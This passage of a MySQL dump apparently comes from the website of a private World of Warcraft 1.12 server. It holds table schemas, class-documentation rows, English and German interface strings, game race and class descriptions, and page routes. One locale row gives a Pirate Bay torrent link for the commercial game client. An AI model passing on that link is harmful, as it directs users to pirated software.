`final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMImplementationList', 'DOMImplementationList', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMNameList', 'DOMNameList', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMStringList', 'DOMStringList', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMException', 'DOMException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('LibXMLError', 'LibXMLError', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DatePeriod', 'DatePeriod', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DateInterval', 'DateInterval', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DateTimeZone', 'DateTimeZone', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DateTime', 'DateTime', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('Closure', 'Closure', '', NULL, 0, 0, 0, '', 0, 1, 0, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ErrorException', 'ErrorException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('Exception', 'Exception', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('stdClass', 'stdClass', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); /*!40000 ALTER TABLE `system_code_docu_class` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_code_docu_class_constant CREATE TABLE IF NOT EXISTS `system_code_docu_class_constant` ( `class` char(255) NOT NULL, `name` char(255) NOT NULL, `dead` bit(1) NOT NULL, PRIMARY KEY (`class`,`name`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.system_code_docu_class_constant: 0 rows /*!40000 ALTER TABLE `system_code_docu_class_constant` DISABLE KEYS */; /*!40000 ALTER TABLE `system_code_docu_class_constant` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_code_docu_class_interface CREATE TABLE IF NOT EXISTS `system_code_docu_class_interface` ( `class` char(255) NOT NULL, `name` char(255) NOT NULL, `dead` bit(1) NOT NULL, PRIMARY KEY (`class`,`name`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.system_code_docu_class_interface: 0 rows /*!40000 ALTER TABLE `system_code_docu_class_interface` DISABLE KEYS */; /*!40000 ALTER TABLE `system_code_docu_class_interface` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_code_docu_class_method CREATE TABLE IF NOT EXISTS `system_code_docu_class_method` ( `class` char(255) NOT NULL, `name` char(255) NOT NULL, `dead` bit(1) NOT NULL, PRIMARY KEY (`class`,`name`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.system_code_docu_class_method: 0 rows /*!40000 ALTER TABLE `system_code_docu_class_method` DISABLE KEYS */; /*!40000 ALTER TABLE `system_code_docu_class_method` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_code_docu_class_property CREATE TABLE IF NOT EXISTS `system_code_docu_class_property` ( `class` char(255) NOT NULL, `name` char(255) NOT NULL, `dead` bit(1) NOT NULL, PRIMARY KEY (`class`,`name`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.system_code_docu_class_property: 0 rows /*!40000 ALTER TABLE `system_code_docu_class_property` DISABLE KEYS */; /*!40000 ALTER TABLE `system_code_docu_class_property` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_code_docu_const CREATE TABLE IF NOT EXISTS `system_code_docu_const` ( `name` char(255) NOT NULL, `text` int(10) DEFAULT NULL, `dead` bit(1) NOT NULL, `value` text NOT NULL, `visibility` int(10) NOT NULL, PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.system_code_docu_const: 0 rows /*!40000 ALTER TABLE `system_code_docu_const` DISABLE KEYS */; /*!40000 ALTER TABLE `system_code_docu_const` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_code_docu_func CREATE TABLE IF NOT EXISTS `system_code_docu_func` ( `name` char(255) NOT NULL, `namespace` char(255) DEFAULT NULL, `text` int(10) DEFAULT NULL, `dead` bit(1) NOT NULL, PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.system_code_docu_func: 0 rows /*!40000 ALTER TABLE `system_code_docu_func` DISABLE KEYS */; /*!40000 ALTER TABLE `system_code_docu_func` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_code_docu_text CREATE TABLE IF NOT EXISTS `system_code_docu_text` ( `id` int(10) NOT NULL, `text` text NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.system_code_docu_text: 0 rows /*!40000 ALTER TABLE `system_code_docu_text` DISABLE KEYS */; /*!40000 ALTER TABLE `system_code_docu_text` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_code_docu_var CREATE TABLE IF NOT EXISTS `system_code_docu_var` ( `name` char(255) NOT NULL, `namespace` char(255) DEFAULT NULL, `text` int(11) DEFAULT NULL, `dead` bit(1) NOT NULL, `static` bit(1) NOT NULL, `visibility` int(10) NOT NULL, PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.system_code_docu_var: 0 rows /*!40000 ALTER TABLE `system_code_docu_var` DISABLE KEYS */; /*!40000 ALTER TABLE `system_code_docu_var` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_cron CREATE TABLE IF NOT EXISTS `system_cron` ( `class` char(255) NOT NULL, `min` int(10) DEFAULT NULL, `hour` int(10) DEFAULT NULL, `day` int(10) DEFAULT NULL, `day_week` int(10) DEFAULT NULL, `month` int(10) DEFAULT NULL, `last_run` timestamp NULL DEFAULT NULL, `status` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`class`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- Exportiere Daten aus Tabelle host_mojotrollz.system_cron: ~1 rows (ungefähr) /*!40000 ALTER TABLE `system_cron` DISABLE KEYS */; INSERT INTO `system_cron` (`class`, `min`, `hour`, `day`, `day_week`, `month`, `last_run`, `status`) VALUES ('\\SYSTEM\\CRON\\cron_log2sqlite', 0, 0, 0, 0, 0, '2015-06-15 16:18:22', 1); /*!40000 ALTER TABLE `system_cron` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_locale_string CREATE TABLE IF NOT EXISTS `system_locale_string` ( `id` char(50) NOT NULL, `category` int(10) unsigned NOT NULL, `enUS` text NOT NULL, `deDE` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Shall hold strings and its translation'; -- Exportiere Daten aus Tabelle host_mojotrollz.system_locale_string: 72 rows /*!40000 ALTER TABLE `system_locale_string` DISABLE KEYS */; INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_mod_login_username', 42, 'Username', 'Username'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_mod_login_password', 42, 'Password', 'Passwort'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_mod_login_login', 42, 'Login', 'Login'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_mod_login_email', 42, 'EMail', 'E-Mail'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_mod_login_last_active', 42, 'Last active', 'Zuletzt aktiv'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_mod_login_join_date', 42, 'Joindate', 'Beitrittsdatum'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_mod_login_locale', 42, 'Locale', 'Sprache'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_mod_login_admin_rights', 42, 'Admin Rights', 'Admin Rechte'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_mod_login_username_too_short', 43, 'Username is too short', 'Nutzername ist zu kurz'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_mod_login_username_too_long', 43, 'Username is too long', 'Nutzername ist zu lang'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_mod_login_username_required', 43, 'Username required', 'Nutzername erfoderlich'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_mod_login_password_too_short', 43, 'Password too short', 'Passwort zu kurz'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_mod_login_password_too_long', 43, 'Password too long', 'Passwort zu lang'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_mod_login_password_required', 43, 'Password required', 'Passwort erforderlich'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('mojotrollz_page_title', 100, 'MojotrollZ', 'MojotrollZ'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('character_name', 100, 'character name', 'Charakter Name'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('race_human', 120, ' \r\nDiplomacy
\r\n \r\nThe Human Spirit
\r\n \r\nMace Specialization
\r\n \r\nSword Specialization
 \r\nPerception

', ' \nDiplomacy
\n \nThe Human Spirit
\n \nMace Specialization
\n \nSword Specialization
 \nPerception

'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('race_dwarf', 120, ' Stoneform
\n Frost Resistance
\n Find Treasure
\n Gun Specialization
', ' Stoneform
\n Frost Resistance
\n Find Treasure
\n Gun Specialization
'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('race_nightelf', 120, ' Shadowmeld
\n Quickness
\n Wisp Spirit
\n Nature Resistance
', ' Shadowmeld
\n Quickness
\n Wisp Spirit
\n Nature Resistance
'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('race_gnome', 120, ' Escape Artist
\n Expansive Mind
\n Arcane Resistance
\n Engineering Specialist
', ' Escape Artist
\n Expansive Mind
\n Arcane Resistance
\n Engineering Specialist
'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('race_ork', 120, ' Blood Fury
\n Hardiness
\n Command
\n Axe Specialization
', ' Blood Fury
\n Hardiness
\n Command
\n Axe Specialization
'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('race_undead', 120, ' Will of the Forsaken
\n Cannibalize
\n Shadow Resistance
\nUnderwater Breathing
', ' Will of the Forsaken
\n Cannibalize
\n Shadow Resistance
\nUnderwater Breathing
'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('race_troll', 120, ' Berserking
\n Regeneration
\n Beast Slaying
\n
Bow Specialization
\nThrowing Specialization
', ' Berserking
\n Regeneration
\n Beast Slaying
\n
Bow Specialization
\nThrowing Specialization
'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('race_tauren', 120, ' War Stomp
\n Endurance
\n Cultivation
\n Nature Resistance
', ' War Stomp
\n Endurance
\n Cultivation
\n Nature Resistance
'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('spawn_info_title', 130, 'Info', 'Info'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('spawn_info_text', 130, '
\n
\n
This is the Spawnpoint
Selection Menu.
\n
You can choose a City,
Friend or POI to spawn at
by clicking on it.
\n
\n
 
\n
', '
This is the Spawnpoint
Selection Menu.
\n
You can choose a City,
Friend or POI to spawn at
by clicking on it.
'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('class_warrior', 120, 'Warrior
For as long as war has raged, heroes from every race have aimed to master the art of battle. Warriors combine strength, leadership, and a vast knowledge of arms and armor to wreak havoc in glorious combat. Some protect from the front lines with shields, locking down enemies while allies support the warrior from behind with spell and bow. Others forgo the shield and unleash their rage at the closest threat with a variety of deadly weapons.', 'Warrior
For as long as war has raged, heroes from every race have aimed to master the art of battle. Warriors combine strength, leadership, and a vast knowledge of arms and armor to wreak havoc in glorious combat. Some protect from the front lines with shields, locking down enemies while allies support the warrior from behind with spell and bow. Others forgo the shield and unleash their rage at the closest threat with a variety of deadly weapons.'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('class_priest', 120, 'Priest
Priests are devoted to the spiritual, and express their unwavering faith by serving the people. For millennia they have left behind the confines of their temples and the comfort of their shrines so they can support their allies in war-torn lands. In the midst of terrible conflict, no hero questions the value of the priestly orders.', 'Priest
Priests are devoted to the spiritual, and express their unwavering faith by serving the people. For millennia they have left behind the confines of their temples and the comfort of their shrines so they can support their allies in war-torn lands. In the midst of terrible conflict, no hero questions the value of the priestly orders.'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('class_druid', 120, 'Druid
Druids harness the vast powers of nature to preserve balance and protect life. With experience, druids can unleash nature’s raw energy against their enemies, raining celestial fury on them from a great distance, binding them with enchanted vines, or ensnaring them in unrelenting cyclones.', 'Druid
Druids harness the vast powers of nature to preserve balance and protect life. With experience, druids can unleash nature’s raw energy against their enemies, raining celestial fury on them from a great distance, binding them with enchanted vines, or ensnaring them in unrelenting cyclones.'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('class_shaman', 120, 'Shaman
Shaman are spiritual guides and practitioners, not of the divine, but of the very elements. Unlike some other mystics, shaman commune with forces that are not strictly benevolent. The elements are chaotic, and left to their own devices, they rage against one another in unending primal fury. It is the call of the shaman to bring balance to this chaos. Acting as moderators among earth, fire, water, and air, shaman summon totems that focus the elements to support the shaman’s allies or punish those who threaten them.', 'Shaman
Shaman are spiritual guides and practitioners, not of the divine, but of the very elements. Unlike some other mystics, shaman commune with forces that are not strictly benevolent. The elements are chaotic, and left to their own devices, they rage against one another in unending primal fury. It is the call of the shaman to bring balance to this chaos. Acting as moderators among earth, fire, water, and air, shaman summon totems that focus the elements to support the shaman’s allies or punish those who threaten them.'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('class_warlock', 120, 'Warlock
In the face of demonic power, most heroes see death. Warlocks see only opportunity. Dominance is their aim, and they have found a path to it in the dark arts. These voracious spellcasters summon demonic minions to fight beside them. At first, they command only the service of imps, but as a warlock’s knowledge grows, seductive succubi, loyal voidwalkers, and horrific felhunters join the dark sorcerer’s ranks to wreak havoc on anyone who stands in their master’s way.', 'Warlock
In the face of demonic power, most heroes see death. Warlocks see only opportunity. Dominance is their aim, and they have found a path to it in the dark arts. These voracious spellcasters summon demonic minions to fight beside them. At first, they command only the service of imps, but as a warlock’s knowledge grows, seductive succubi, loyal voidwalkers, and horrific felhunters join the dark sorcerer’s ranks to wreak havoc on anyone who stands in their master’s way.'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('class_rogue', 120, 'Rogue
For rogues, the only code is the contract, and their honor is purchased in gold. Free from the constraints of a conscience, these mercenaries rely on brutal and efficient tactics. Lethal assassins and masters of stealth, they will approach their marks from behind, piercing a vital organ and vanishing into the shadows before the victim hits the ground.', 'Rogue
For rogues, the only code is the contract, and their honor is purchased in gold. Free from the constraints of a conscience, these mercenaries rely on brutal and efficient tactics. Lethal assassins and masters of stealth, they will approach their marks from behind, piercing a vital organ and vanishing into the shadows before the victim hits the ground.'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('class_hunter', 120, 'Hunter
From an early age the call of the wild draws some adventurers from the comfort of their homes into the unforgiving primal world outside. Those who endure become hunters. Masters of their environment, they are able to slip like ghosts through the trees and lay traps in the paths of their enemies.', 'Hunter
From an early age the call of the wild draws some adventurers from the comfort of their homes into the unforgiving primal world outside. Those who endure become hunters. Masters of their environment, they are able to slip like ghosts through the trees and lay traps in the paths of their enemies.'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('class_paladin', 120, 'Paladin
This is the call of the paladin: to protect the weak, to bring justice to the unjust, and to vanquish evil from the darkest corners of the world. These holy warriors are equipped with plate armor so they can confront the toughest of foes, and the blessing of the Light allows them to heal wounds and, in some cases, even restore life to the dead.', 'Paladin

This is the call of the paladin: to protect the weak, to bring justice to the unjust, and to vanquish evil from the darkest corners of the world. These holy warriors are equipped with plate armor so they can confront the toughest of foes, and the blessing of the Light allows them to heal wounds and, in some cases, even restore life to the dead.'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('friend_name', 100, 'enter friend\'s name', 'Name des Freundes'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('friend_title', 100, 'Friendlist', 'Freundesliste'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_username_short', 43, 'Username is too short', 'Nutzername ist zu kurz'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('spawn_friendlist_title', 130, 'Friendlist', 'Freundesliste'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_username_long', 43, 'Username is too long', 'Nutzername ist zu lang'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_username_miss', 43, 'Username required', 'Nutzername erfoderlich'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_password_miss', 43, 'Password required', 'Passwort erforderlich'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_password_long', 43, 'Password too long', 'Passwort zu lang'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_password_short', 43, 'Password too short', 'Passwort zu kurz'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_password_match', 43, 'Passwords do not match!', 'Passwords do not match!'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_error_email_wrong', 43, 'Invalid EMail!', 'Invalid EMail!'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_logout', 1, 'Logout', 'Ausloggen'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_login', 1, 'Login', 'Einloggen'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_register', 1, 'Register', 'Registrieren'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_username', 1, 'Username', 'Username'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_password', 1, 'Password', 'Passwort'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_email', 1, 'EMail', 'E-Mail2'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_last_active', 1, 'Last active', 'Zuletzt aktiv'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_join_date', 1, 'Joindate', 'Beitrittsdatum'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_locale', 1, 'Locale', 'Sprache'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_admin_rights', 1, 'Admin Rights', 'Admin Rechte'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_cancel', 1, 'Cancel', 'Abbrechen'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_text_logout', 1, 'Logout before you leave!', 'Loggen Sie sie sich aus bevor Sie gehen!'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_text_login', 1, 'Login to your Website.', 'Loggen Sie sich in ihre Website ein.'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_text_register', 1, 'Register an Account', 'Register an Account'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_text_password_miss', 1, 'Can\'t really remember your Password?', 'Can\'t really remember your Password?'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_placeholder_username', 1, 'peter / peter@world.org', 'peter / peter@world.org'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_placeholder_password', 1, 'my secret123', 'geheim567'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_placeholder_email', 1, 'peter@world.org', 'peter@world.org'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('basic_state_login', 1, 'You are logged in.', 'You are logged in.'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('sai_mod_login_text', 42, 'Please login for developer access (if you are a developer).', 'Please login for developer access (if you are a developer).'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('database_version', 140, 'mojo', 'mojo'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('realmlist', 140, 'mojotrollz.eu', 'mojotrollz.eu'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('server_version', 140, 'mojo', 'mojo'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('client_version', 140, '1.12.1/1.12.2', '1.12.1/1.12.2'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('url_realmlistwtf', 140, '', ''); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('url_wowclient', 140, 'http://thepiratebay.se/torrent/7784594/World_of_Warcraft_1.12.1_Vanilla_-_Windows_ENGLISH', 'http://thepiratebay.se/torrent/7784594/World_of_Warcraft_1.12.1_Vanilla_-_Windows_ENGLISH'); INSERT INTO `system_locale_string` (`id`, `category`, `enUS`, `deDE`) VALUES ('default', 120, 'Mojotrollz - simply the best.', 'Mojotrollz - simply the best.'); /*!40000 ALTER TABLE `system_locale_string` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_log CREATE TABLE IF NOT EXISTS `system_log` ( `ID` int(10) NOT NULL AUTO_INCREMENT, `class` text NOT NULL, `message` text NOT NULL, `code` int(11) NOT NULL, `file` text NOT NULL, `line` int(11) NOT NULL, `trace` text NOT NULL, `ip` text NOT NULL, `querytime` double NOT NULL, `time` datetime NOT NULL, `server_name` char(255) NOT NULL, `server_port` int(10) unsigned NOT NULL, `request_uri` char(255) NOT NULL, `post` text NOT NULL, `http_referer` char(255) DEFAULT NULL, `http_user_agent` text NOT NULL, `user` int(11) DEFAULT NULL, `thrown` bit(1) NOT NULL, PRIMARY KEY (`ID`) ) ENGINE=MyISAM AUTO_INCREMENT=513571 DEFAULT CHARSET=utf8; -- Exportiere Daten aus Tabelle host_mojotrollz.system_log: 95.780 rows /*!40000 ALTER TABLE `system_log` DISABLE KEYS */; /*!40000 ALTER TABLE `system_log` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_page CREATE TABLE IF NOT EXISTS `system_page` ( `id` int(10) unsigned NOT NULL, `group` int(10) unsigned NOT NULL, `name` char(50) COLLATE utf8_unicode_ci NOT NULL, `state` char(50) COLLATE utf8_unicode_ci NOT NULL, `parent_id` int(10) NOT NULL, `login` int(10) unsigned NOT NULL DEFAULT '0', `type` int(10) unsigned NOT NULL DEFAULT '0', `div` char(50) COLLATE utf8_unicode_ci NOT NULL, `url` text COLLATE utf8_unicode_ci NOT NULL, `func` char(50) COLLATE utf8_unicode_ci NOT NULL, `php_class` char(50) COLLATE utf8_unicode_ci NOT NULL, PRIMARY KEY (`id`,`group`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; -- Exportiere Daten aus Tabelle host_mojotrollz.system_page: ~92 rows (ungefähr) /*!40000 ALTER TABLE `system_page` DISABLE KEYS */; INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (0, 42, 'start', 'start', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saistart_sys_sai', 'init_saistart_sys_sai', '\\SYSTEM\\SAI\\saistart_sys_sai'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (1, 1, 'start', 'start', -1, 0, 0, '#frame_content', './?page=wizard_start', 'init_start', 'wizard_start'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (1, 42, 'todo', 'start', 0, 1, 0, '#todo_entries', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=todolist', 'init_saistart_sys_sai_todo', '\\SYSTEM\\SAI\\saistart_sys_sai'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (2, 42, 'log', 'start', 0, 1, 0, '#log_entries', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=filter', 'init_saistart_sys_sai_log', '\\SYSTEM\\SAI\\saistart_sys_sai'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (10, 1, 'wizard_details', 'wizard_details', -1, 0, 0, '#frame_content', './?page=wizard_details', 'init_wizard_details', 'wizard_details'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (10, 2, 'user_achievements_menu', 'user_achievements_menu', -1, 0, 0, '#frame_content', './?page=user_achievements_menu', 'init_user_achievements_menu', 'user_achievements_menu'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (10, 42, 'api', 'api', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_api', 'init_saimod_sys_api', '\\SYSTEM\\SAI\\saimod_sys_api'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (11, 1, 'wizard_details_toolbar', 'wizard_details', 10, 0, 0, '#frame_content_toolbar', 